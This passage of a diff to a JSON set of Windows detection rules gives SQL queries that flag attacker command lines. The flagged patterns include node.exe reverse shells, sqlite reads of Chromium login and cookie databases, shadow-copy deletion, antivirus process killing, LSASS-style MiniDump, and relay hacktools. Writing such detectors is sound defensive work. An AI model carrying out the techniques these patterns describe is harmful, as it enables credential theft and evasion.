FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE 
'\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. 
This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network 
related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ + "attack.privilege_escalation", "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.t1033" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "status": "test", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ 
- "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ], - "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe 
server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_pua_chisel.yml" - }, - { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName 
LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" - }, - { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, 
regsvr32, mshta, eventvwr\n", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.execution", - "attack.t1574.002" + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", - "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + 
"attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" - ], 
- "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" - }, - { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", - "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "falsepositives": [ - "Legitimate software creating script event consumers" + "attack.defense_evasion", + "attack.t1127" ], - "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "status": "experimental", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, 
and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], 
@@ -10299,73 +9981,28 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" - }, - { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_hktl_dinjector.yml" - }, - { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' 
AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { "title": "Potential SMB Relay Attack Tool Execution", @@ -10386,26 +10023,6 @@ ], "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, - { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, { "title": "HackTool - winPEAS Execution", "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", 
@@ -10428,43 +10045,63 @@ "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + }, + { + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' 
AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine 